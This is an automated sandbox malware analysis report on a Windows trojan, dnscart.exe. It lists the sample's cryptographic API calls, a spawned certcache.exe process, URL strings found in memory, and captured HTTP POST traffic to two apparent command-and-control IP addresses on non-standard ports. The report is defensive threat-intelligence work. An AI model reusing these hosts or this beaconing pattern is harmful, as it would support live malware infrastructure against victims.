
Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0
Analysis ID: 491
Start time: 21:07:28
Joe Sandbox Product: Cloud
Start date: 23.01.2018
Overall analysis duration: 0h 11m 24s
Hypervisor based Inspection enabled: true
Report type: full
Sample file name: dnscart.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 HVM (Office 2010, IE8, FF 50.1, Chrome 54.0, Java 1.8.0_111, Adobe Reader DC 2015.02)
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Detection: MAL
Classification: mal56.troj.winEXE@11/1@0/3
HCA Information:
  • Successful, ratio: 94%
  • Number of executed functions: 81
  • Number of non-executed functions: 152
EGA Information:
  • Successful, ratio: 80%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): spsys.sys, dllhost.exe
  • Execution Graph export aborted for target sppsvc.exe, PID 2868 because there are no executed function
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: mscorsvw.exe, mscorsvw.exe


Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 56 | 0 - 100 | Report FP / FN | malicious


Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification

Signature Overview



Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\dnscart.exe, Code function: 2_2_0022914E _snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,2_2_0022914E
Source: C:\Users\user\Desktop\dnscart.exe, Code function: 2_2_002290BE memset,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,WaitForSingleObject,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,2_2_002290BE
Source: C:\Users\user\Desktop\dnscart.exe, Code function: 2_2_002291F0 CreateEventW,SignalObjectAndWait,ResetEvent,ReleaseMutex,CloseHandle,GetTickCount,CreateTimerQueueTimer,WaitForSingleObject,DeleteTimerQueueTimer,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,2_2_002291F0
Source: C:\Users\user\Desktop\dnscart.exe, Code function: 2_2_0022259B RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,2_2_0022259B
Source: C:\Users\user\Desktop\dnscart.exe, Code function: 2_2_00222505 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,2_2_00222505
Source: C:\Users\user\Desktop\dnscart.exe, Code function: 2_2_00222447 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,2_2_00222447
Source: C:\Users\user\Desktop\dnscart.exe, Code function: 2_2_002224C8 CryptExportKey,CryptDestroyHash,GetProcessHeap,HeapFree,2_2_002224C8
Source: C:\Windows\SysWOW64\certcache.exe, Code function: 4_2_00132447 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,4_2_00132447
Source: C:\Windows\SysWOW64\certcache.exe, Code function: 4_2_001391F0 CreateEventW,SignalObjectAndWait,ResetEvent,ReleaseMutex,CloseHandle,GetTickCount,CreateTimerQueueTimer,WaitForSingleObject,DeleteTimerQueueTimer,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_001391F0
Source: C:\Windows\SysWOW64\certcache.exe, Code function: 4_2_0013914E _snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_0013914E
Source: C:\Windows\SysWOW64\certcache.exe, Code function: 4_2_001324C8 CryptExportKey,CryptDestroyHash,GetProcessHeap,HeapFree,4_2_001324C8
Source: C:\Windows\SysWOW64\certcache.exe, Code function: 4_2_001390BE memset,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,WaitForSingleObject,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_001390BE
Source: C:\Windows\SysWOW64\certcache.exe, Code function: 4_2_0013259B RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,4_2_0013259B
Source: C:\Windows\SysWOW64\certcache.exe, Code function: 4_2_00132505 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,4_2_00132505

Networking:

Found strings which match to known social media URLs
Posts data to webserver
Source: unknown
HTTP traffic detected:
POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 69.16.193.12:4143
Content-Length: 308
Connection: Keep-Alive
Cache-Control: no-cache
URLs found in memory or binary data
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://service2.bfast.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://si.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://si.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://si.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://so-net.search.goo.ne.jp/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://spaces.live.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://spaces.live.com/BlogIt.aspx
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://suche.aol.de/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://suche.freenet.de/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://suche.freenet.de/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://suche.lycos.de/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://suche.t-online.de/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://suche.web.de/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://suche.web.de/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://treyresearch.net
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://tw.search.yahoo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://udn.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://udn.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://uk.ask.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://uk.ask.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://uk.search.yahoo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://vachercher.lycos.fr/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://video.globo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://video.globo.com/favicon.ico
Source: svchost.exeString found in binary or memory: http://w
Source: sppsvc.exeString found in binary or memory: http://wC
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://web.ask.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.%s.com
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.%s.comPA
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.abril.com.br/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.abril.com.br/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.alarabiya.net/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.amazon.co.jp/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.amazon.co.uk/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.amazon.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.amazon.de/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.aol.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.arrakis.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.arrakis.com/favicon.ico
Source: svchost.exeString found in binary or memory: http://www.ascendercorp.com/
Source: svchost.exeString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: svchost.exeString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlt
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.asharqalawsat.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.ask.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.auction.co.kr/auction.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.baidu.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.baidu.com/favicon.ico
Source: svchost.exeString found in binary or memory: http://www.bethmardutho.org.
Source: svchost.exeString found in binary or memory: http://www.bethmardutho.org.P
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.bing.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.bing.com/maps/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.bing.com/maps/default.aspx
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.bing.com/maps/geotager.aspx
Source: sppsvc.exeString found in binary or memory: http://www.bing.com/search?q=
Source: svchost.exeString found in binary or memory: http://www.c-and-g.co.jp
Source: svchost.exeString found in binary or memory: http://www.c-and-g.co.jpim.
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.cdiscount.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.ceneo.pl/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.cjmall.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.cjmall.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.clarin.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.cnet.co.uk/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.cnet.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.dailymail.co.uk/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.etmall.com.tw/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.excite.co.jp/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.expedia.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.expedia.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.facebook.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.facebook.com/favicon.ico
Source: svchost.exeString found in binary or memory: http://www.fontbureau.com
Source: svchost.exeString found in binary or memory: http://www.fontbureau.com/designers
Source: svchost.exeString found in binary or memory: http://www.fontbureau.com/designers/
Source: svchost.exeString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: svchost.exeString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: svchost.exeString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: svchost.exeString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmln.N
Source: svchost.exeString found in binary or memory: http://www.fontbureau.com/designers?
Source: svchost.exeString found in binary or memory: http://www.fontbureau.comce
Source: svchost.exeString found in binary or memory: http://www.fonts.com
Source: svchost.exeString found in binary or memory: http://www.founder.com.cn/cn/
Source: svchost.exeString found in binary or memory: http://www.founder.com.cn/cnm
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.gmarket.co.kr/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.co.in/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.co.jp/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.co.uk/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.com.br/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.com.sa/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.com.tw/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.cz/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.de/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.es/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.fr/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.it/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.pl/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.ru/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.google.si/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.iask.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.iask.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.kkbox.com.tw/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.linternaute.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.maktoob.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.mercadolibre.com.mx/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.mercadolivre.com.br/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.merlin.com.pl/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: sppsvc.exeString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.mtv.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.mtv.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.myspace.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.najdi.si/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.najdi.si/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.nate.com/favicon.ico
Source: svchost.exeString found in binary or memory: http://www.ncst.ernet.in/~rkjoshi
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.neckermann.de/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.neckermann.de/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.news.com.au/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.nifty.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.orange.fr/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.otto.de/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.ozon.ru/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.ozon.ru/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.ozu.es/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.paginasamarillas.es/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.priceminister.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.priceminister.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.rambler.ru/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.rambler.ru/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.recherche.aol.fr/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.rtl.de/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.rtl.de/favicon.ico
Source: svchost.exeString found in binary or memory: http://www.sakkal.com
Source: svchost.exeString found in binary or memory: http://www.sakkal.com:
Source: svchost.exeString found in binary or memory: http://www.sandoll.co.kr
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.servicios.clarin.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.shopzilla.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.sify.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.sogou.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.sogou.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.soso.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.soso.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.t-online.de/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.taobao.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.taobao.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.target.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.target.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.tchibo.de/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.tchibo.de/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.tesco.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.tesco.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: svchost.exeString found in binary or memory: http://www.tiro.com#8H
Source: svchost.exeString found in binary or memory: http://www.tiro.com;Copyright
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.tiscali.it/favicon.ico
Source: svchost.exeString found in binary or memory: http://www.typography.net
Source: svchost.exeString found in binary or memory: http://www.typography.netD
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.univision.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.univision.com/favicon.ico
Source: svchost.exeString found in binary or memory: http://www.urwpp.de
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.walmart.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.walmart.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.weather.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.weather.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.ya.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.yam.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.yandex.ru/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www.yandex.ru/favicon.ico
Source: svchost.exeString found in binary or memory: http://www.zhongyicts.com.cn
Source: svchost.exeString found in binary or memory: http://www.zhongyicts.com.cno.kKH
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www3.fnac.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://www3.fnac.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: svchost.exeString found in binary or memory: http://y
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://yellowpages.superpages.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://yellowpages.superpages.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: http://z.about.com/m/a08.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: https://
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: https://example.com
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: https://localhost
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exeString found in binary or memory: https://www.example.com.
Social media urls found in memory data
Source: sppsvc.exe, mscorsvw.exe, svchost.exe, dnscart.exe, certcache.exe | String found in binary or memory: http://www.facebook.com/
Source: sppsvc.exe, mscorsvw.exe, svchost.exe, dnscart.exe, certcache.exe | String found in binary or memory: http://www.facebook.com/favicon.ico
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 69.16.193.12:4143 | Content-Length: 308 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 178.32.255.132:7080 | Content-Length: 308 | Connection: Keep-Alive | Cache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.2:49158 -> 69.16.193.12:4143
